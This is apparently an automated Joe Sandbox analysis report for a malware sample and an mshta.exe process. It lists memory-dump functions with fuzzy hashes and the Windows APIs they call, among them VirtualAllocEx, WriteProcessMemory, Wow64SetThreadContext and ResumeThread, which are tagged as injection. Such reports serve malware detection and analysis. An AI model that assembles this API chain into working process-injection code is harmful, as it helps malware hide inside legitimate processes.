Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: CreateProcess
String ID: gA$gA$gA
API String ID: 963392458-3592020018
Opcode ID: 3ff9c0645dcdb5c8638bac5ba478b0bb318b27727b10212b084e92eb124606c7
Instruction ID: bff7dacc4aae30c34c5ccd4e54ad4cdd71e02b5780f429e44f5cb44c0850c20d
Opcode Fuzzy Hash: 3ff9c0645dcdb5c8638bac5ba478b0bb318b27727b10212b084e92eb124606c7
Instruction Fuzzy Hash: 25C12670D002198FDF24DFA8C945BEEBBF1BB09304F0091AAD819B7250DB749A85CF95

Function 001DDF38 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001DE00B

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b6bd352cbc45e1dd329b5b4dd94831b09a4640de9ab316620ecb64a1854ac5fc
Instruction ID: 27dbb12979a28cd5fbcf71c151a93c82c0a02251171a9f479a4a19f54e461996
Opcode Fuzzy Hash: b6bd352cbc45e1dd329b5b4dd94831b09a4640de9ab316620ecb64a1854ac5fc
Instruction Fuzzy Hash: CC41A9B5D012589FCF10CFA9D984AEEFBF1BB49314F20902AE814BB210D375AA45CF64

Function 001DDF30 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001DE00B

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a2e56740fa7f4ea4b840ffca44c0dd01509e9702fc7976add0950400bf0e6300
Instruction ID: 074b016a9193faedec816bb5b2c8799f37a92067ff2d5c6cd95e563d90594585
Opcode Fuzzy Hash: a2e56740fa7f4ea4b840ffca44c0dd01509e9702fc7976add0950400bf0e6300
Instruction Fuzzy Hash: 5241ABB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814BB250D375AA45CF64

Function 001DE090 Relevance: 1.6, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001DE14A

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a87ae4de1d02e872e4725a2e9982916def8203b8b0ea1e0a8addd46c82c861d7
Instruction ID: 73630b01d6a94d59bc99f2d306241e7ca0872acc3aed8742bed27f9480da0f0e
Opcode Fuzzy Hash: a87ae4de1d02e872e4725a2e9982916def8203b8b0ea1e0a8addd46c82c861d7
Instruction Fuzzy Hash: 7241BBB8D042589FCF10CFA9D984AEEFBB1BF49310F14902AE815BB210D334A945CF64

Function 001DE098 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001DE14A

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1d2eacea51348592417d4907b8c34cba5b970cc28cbab21ea56c15afce6d09ab
Instruction ID: 7f88e6e3546f471ab2be3569273684a117fc5052a7654b27f009a13debdd92a7
Opcode Fuzzy Hash: 1d2eacea51348592417d4907b8c34cba5b970cc28cbab21ea56c15afce6d09ab
Instruction Fuzzy Hash: B74199B9D002589FCF10CFA9D984AEEFBB1BB49314F14942AE814BB300D735A945CF64

Function 001DDE09 Relevance: 1.6, APIs: 1, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001DDEBA

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e4883b6ca6ecd75dd1c48c0c4ec449f88893570e463f2ea70380595ac353ec49
Instruction ID: ff653a18598a81d47250147d83e849eb7e3809ab7fc29755c89d4ed286b20a26
Opcode Fuzzy Hash: e4883b6ca6ecd75dd1c48c0c4ec449f88893570e463f2ea70380595ac353ec49
Instruction Fuzzy Hash: F04199B8D002589FCF10CFA9D984AEEFBB1BB49314F10941AE815BB314D735A906CF64

Function 001DDE10 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001DDEBA

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6c8a4ba94e784b7a984b530702e84cff829078ea0914400e825ba6a85b85f1fc
Instruction ID: eb07deb500a13777afe20704fcd32ce2415c7c0adc84d1db7fad2cb11a68a109
Opcode Fuzzy Hash: 6c8a4ba94e784b7a984b530702e84cff829078ea0914400e825ba6a85b85f1fc
Instruction Fuzzy Hash: 6B4199B8D002589FCF10CFA9D984AEEFBB1BB49310F10942AE815BB314D735A945CFA5

Function 001DDF70 Relevance: 1.6, APIs: 1, Instructions: 102injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 001DE00B

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e8353fd4690c8f81f0b0761cfee5e98d6fa2f11973e4d15dd708605d762bf40c
Instruction ID: aa88e38c1bc1a68a9a71e082734e7456dba20d2ff29959d9a0ee9b45e752e03c
Opcode Fuzzy Hash: e8353fd4690c8f81f0b0761cfee5e98d6fa2f11973e4d15dd708605d762bf40c
Instruction Fuzzy Hash: DC31DD75D002499FCF04CFA8D880AEEFBF1AF49314F24901AE815B7250C735AA46DF64

Function 001DD8A0 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001DD957

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3bb36972f2d2c95563901a85b9fbf1ff5226edeb31844a0e7bf51650a24454af
Instruction ID: 13e072904bb177a3ff7de40d82017b0cd1b478966f7799242af517910301c317
Opcode Fuzzy Hash: 3bb36972f2d2c95563901a85b9fbf1ff5226edeb31844a0e7bf51650a24454af
Instruction Fuzzy Hash: 8541BCB5D002589FCF14CFA9D984AEEFBB1BB49314F24802AE418BB344D739A949CF54

Function 001DD8A8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001DD957

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 36bc815b71157c68a9c50752b29803f003f1fc15c3f2e684c466fdc9a27218d4
Instruction ID: 529447dd643201e5166ca119ab4a33032cc718a85fb283710b85d1658ee88c15
Opcode Fuzzy Hash: 36bc815b71157c68a9c50752b29803f003f1fc15c3f2e684c466fdc9a27218d4
Instruction Fuzzy Hash: 4341ACB5D002589FCF14CFA9D984AEEFBB1BB49314F24802AE418B7344D739A949CF54

Function 001DD7B1 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 001DD836

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 00d37f6411858d82637ed1ad83ae1a424f9e0b9e7f829f82d81a07089732e0e2
Instruction ID: dfe0d71d393038c4b9d50e2572d84841f248ae63599ad8ef3e4fa94644961a7c
Opcode Fuzzy Hash: 00d37f6411858d82637ed1ad83ae1a424f9e0b9e7f829f82d81a07089732e0e2
Instruction Fuzzy Hash: 3531CBB5D002189BCF14CFA9E984AAEFBB5AB49314F24842AE814B7300D735A906CF94

Function 001DD7B8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 001DD836

Memory Dump Source

Source File: 00000015.00000002.493089876.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1d0000_rrwscqkDSNwLK.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 64efa629a5003ad5b3d337036a5990b4ec5fe01593edf68f511c416615152de9
Instruction ID: ba5c0bc51f62ed95a53932c4654eee57898598122d994b6c3a94f4bda2268bfb
Opcode Fuzzy Hash: 64efa629a5003ad5b3d337036a5990b4ec5fe01593edf68f511c416615152de9
Instruction Fuzzy Hash: F231BAB4D002189FCF14CFA9E984AAEFBB5BF49314F24942AE814B7300D735A905CF94

Function 00570D3C Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

gA, xrefs: 00570D6E

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID: gA
API String ID: 0-3478526202
Opcode ID: daed4241551ff65b3470a795dabd0d3b66c9108269b6362b18e48e86bf34d018
Instruction ID: c08080004b7ff9dcbe0dde76ca0c52c1f80c5aecd97bae9a56fe3b5da82dc04f
Opcode Fuzzy Hash: daed4241551ff65b3470a795dabd0d3b66c9108269b6362b18e48e86bf34d018
Instruction Fuzzy Hash: EA410975D45619CBCB24CF54D840BE9BBB9BF99300F20A6AAD50DA6280E7706AC4EF40

Function 00570F33 Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

(, xrefs: 00571808

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: aa196ca7c854290d3bdc04376cb20980babe358d928d1c23953a6542c110429f
Instruction ID: 0909426b4d4673bfaa99366bb8d0f37e69097100de2d4df3755b05022108d12b
Opcode Fuzzy Hash: aa196ca7c854290d3bdc04376cb20980babe358d928d1c23953a6542c110429f
Instruction Fuzzy Hash: 9A01EF3594A228CFDB24CF68D884BE8BBBAFB09304F14919AD40DA3251C7319E82DF04

Function 00570E9A Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7637398d5464003677edfb2a1e7c750c8bd843912a2027ff531008f462aabb19
Instruction ID: 81472d4f34225baa1fb19ac5f3fffdbd04f921fec3dc50c7e5e1ed11c8c9ceda
Opcode Fuzzy Hash: 7637398d5464003677edfb2a1e7c750c8bd843912a2027ff531008f462aabb19
Instruction Fuzzy Hash: B2410E74909618CFCB64CF58E9547E8BBB9BB4A311F14D4EA840EA7291C7319AC5EF04

Function 00570EBE Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c23e79a404dc464c8ce47ed43b1fc1ed3eb6c0254714203123e639b0858d38
Instruction ID: 92e1e72cc9b455cc0d9ed9d638c63d3eb1765647e113e01237af9d2c1c572eec
Opcode Fuzzy Hash: a6c23e79a404dc464c8ce47ed43b1fc1ed3eb6c0254714203123e639b0858d38
Instruction Fuzzy Hash: 5821D474D09218CFDB60CF68D884BECBBBABB89314F2495A9D80DA7255C7315E81EF44

Function 00570CE4 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e032b57c37ab469777f0a0ef96bdaccd594029209a2cd03400b9fbe37768705f
Instruction ID: e84c4ec6530c838a62f65527bb8557466e2553627ab9a510a21666cfa0690a86
Opcode Fuzzy Hash: e032b57c37ab469777f0a0ef96bdaccd594029209a2cd03400b9fbe37768705f
Instruction Fuzzy Hash: 4E112875A45218DFDB60CF58DD84BECBBB8BB59300F2494AAE54EA7280C7B05AC1DF44

Function 00570478 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2cc6d6130537e39f5f69267c4f4b4bbb397c02f8e3fb7aebf971c403b36a348
Instruction ID: b7fd4fd2dd04c672688ef576083244a3ee7398a2d60f2d5703a1c90b4d8af093
Opcode Fuzzy Hash: f2cc6d6130537e39f5f69267c4f4b4bbb397c02f8e3fb7aebf971c403b36a348
Instruction Fuzzy Hash: 141190B8D05209DFCF44DFA9E5456AEBBF6BB88300F20D5AAC919A3354E7305A41DF90

Function 00570D14 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da88a5175a842463bc80a19dad1cf4eaabe9c0919eba8e67d313ebe4f52d82f1
Instruction ID: 715fe5ee92444a6d9cf1d59fadf449cc8a0bd8f703d953ff41591b4654e37d8d
Opcode Fuzzy Hash: da88a5175a842463bc80a19dad1cf4eaabe9c0919eba8e67d313ebe4f52d82f1
Instruction Fuzzy Hash: 14110575A44218DFDB64CF54DC80BECBBB8BB19300F24949AE90DA7280C7709A81DF14

Function 00571113 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d417180623fd148945b11af43c39917a013b4c157176ccfa85db25c2e0025808
Instruction ID: c17817b96b39abc23d20db21bd6dc72a157318748c0eacae4c8d68cedee0dd20
Opcode Fuzzy Hash: d417180623fd148945b11af43c39917a013b4c157176ccfa85db25c2e0025808
Instruction Fuzzy Hash: 20110674908218CFCB50DF64D885BECBBF9AB09300F1499D9D40DAB292C7344AC9DF45

Function 00570E47 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30401263d4213455955c6b8c78f81a39a302e20c24314f2a76181298dfb93fa8
Instruction ID: 11e90337818860851f9bd39edc50fb3eceb7208900ff7db962e717dcf8bcfaea
Opcode Fuzzy Hash: 30401263d4213455955c6b8c78f81a39a302e20c24314f2a76181298dfb93fa8
Instruction Fuzzy Hash: DC012C75A44214DFDB24CF54DC45BECBBB8BB59300F24C099E50EAB281C7705A85DF44

Function 005713DB Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45faf020936eda5c684e131a4961510f5b5feca3b313a2cd8b936b66c0d91d7
Instruction ID: 39298272925869db3185b670b0dcd8deeadaceb2ef3abd2c69ddfb3eb4b7bdab
Opcode Fuzzy Hash: a45faf020936eda5c684e131a4961510f5b5feca3b313a2cd8b936b66c0d91d7
Instruction Fuzzy Hash: 9F010C74D082548FDB55CF68D894ADCBBB5BF4A304F2480EAD90DAB246C7325A41DF45

Function 00571204 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f50607ad1571457edb41579d5f6003c819e88d651812594e2780b1941cbea7
Instruction ID: b870593f41a71579f222e888a0358b35c651362ab740874b172e5ad0ef696b4c
Opcode Fuzzy Hash: 04f50607ad1571457edb41579d5f6003c819e88d651812594e2780b1941cbea7
Instruction Fuzzy Hash: A3011935906228CFCB24CFA4D940BEDBBB5FF49304F2890DA900DA7252C6316A86EF45

Function 00571184 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7557ea293d82b3a4456802bdaa83e7bc81ff0b7284601d51f94bb9007a881c00
Instruction ID: b10255bf7488fb3350a353175f629fdcfd30d156a38bc3cfeb6704ac8bca82cb
Opcode Fuzzy Hash: 7557ea293d82b3a4456802bdaa83e7bc81ff0b7284601d51f94bb9007a881c00
Instruction Fuzzy Hash: 80018634918394CFCB10CB24D858AE8BBB4BF06310F18C5D6881D972D2D7304985DF44

Function 00571C38 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b068a8e489aaa7fc6d02cfe4b958a45487b0838e9a03eba2daec833aee83dd57
Instruction ID: 54425ff0b31f96d95ea8f06362e3257f625c27f68cf511963268e1d3feb6312a
Opcode Fuzzy Hash: b068a8e489aaa7fc6d02cfe4b958a45487b0838e9a03eba2daec833aee83dd57
Instruction Fuzzy Hash: E5F0F474E40609DFCB00DFA9D9806AEFBF9BB49300F24D5AAC818E3300E7709A41DB84

Function 00570FC8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eecb4f2f3e0c8fe41782f42d55f36b0e6b3d803fa59f449c5194cda8322d41c
Instruction ID: 20a89264326292e8203188cfa8dd7c511fc9053900d877b6c2b3e586178517dc
Opcode Fuzzy Hash: 9eecb4f2f3e0c8fe41782f42d55f36b0e6b3d803fa59f449c5194cda8322d41c
Instruction Fuzzy Hash: 9901DDB0900228DFCBA0DF54D881BD8BBF8BB09300F1484D9E60CA3281CB319AC9EF50

Function 00570938 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd9fa5344afb710caa5e76169c9e4e240a7c5641f01b2874250de7d47b3a542
Instruction ID: b753796056f472b892347813d4f5ad60486a8a7fe7c6f7f80240adf00d168deb
Opcode Fuzzy Hash: 9dd9fa5344afb710caa5e76169c9e4e240a7c5641f01b2874250de7d47b3a542
Instruction Fuzzy Hash: A5F03030D04208DFDB40DFA5E9846EDBBF9BB89301F10E1A5C40DA3295D7305A40EF48

Function 0057188A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b258d0c86c9df2536bc6a7f9a315699f3bf51f459302fb54c6ea8914d40ab4ff
Instruction ID: 0cc021b9780db6eb4d313df4c3bc140a7f180d3822739eacb4557717bd9bd04f
Opcode Fuzzy Hash: b258d0c86c9df2536bc6a7f9a315699f3bf51f459302fb54c6ea8914d40ab4ff
Instruction Fuzzy Hash: 8AE03974959B1ACFC794EB64E89C6EDBAB4FF4A341B0048E9980BA6260CB304D40DF00

Function 00571AB0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.500556916.0000000000570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_570000_rrwscqkDSNwLK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87e4f49b6f2a0cd5de06b62fdb12b86d2e7b194fb578474cf4b75e06b78ef1d
Instruction ID: f97b73a7d60ac2e260038737b7f11892ee0199e4b591044e54f3827bc7c8f5d6
Opcode Fuzzy Hash: d87e4f49b6f2a0cd5de06b62fdb12b86d2e7b194fb578474cf4b75e06b78ef1d
Instruction Fuzzy Hash: BED02230402208EBC714EFB8E51076E77BDEB41301F0440ADD40803340CB324D00CF89

Analysis Process: mshta.exePID: 3768, Parent PID: 564COMMON

Executed Functions

Function 03330FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.496359926.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_3_3330000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03330FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.496359926.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_3_3330000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03330FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.496359926.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_3_3330000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Function 03330FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000003.496359926.0000000003330000.00000010.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_3_3330000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction ID: 853f8ae45b9bd5f43ea47ab5014f28f3aac1d23a9a171b87306120e00be7b7dc
Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
Instruction Fuzzy Hash:

Analysis Process: rrwscqkDSNwLK.exePID: 1988, Parent PID: 2148COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	299
Total number of Limit Nodes:	12

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_400000_rrwscqkDSNwLK.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
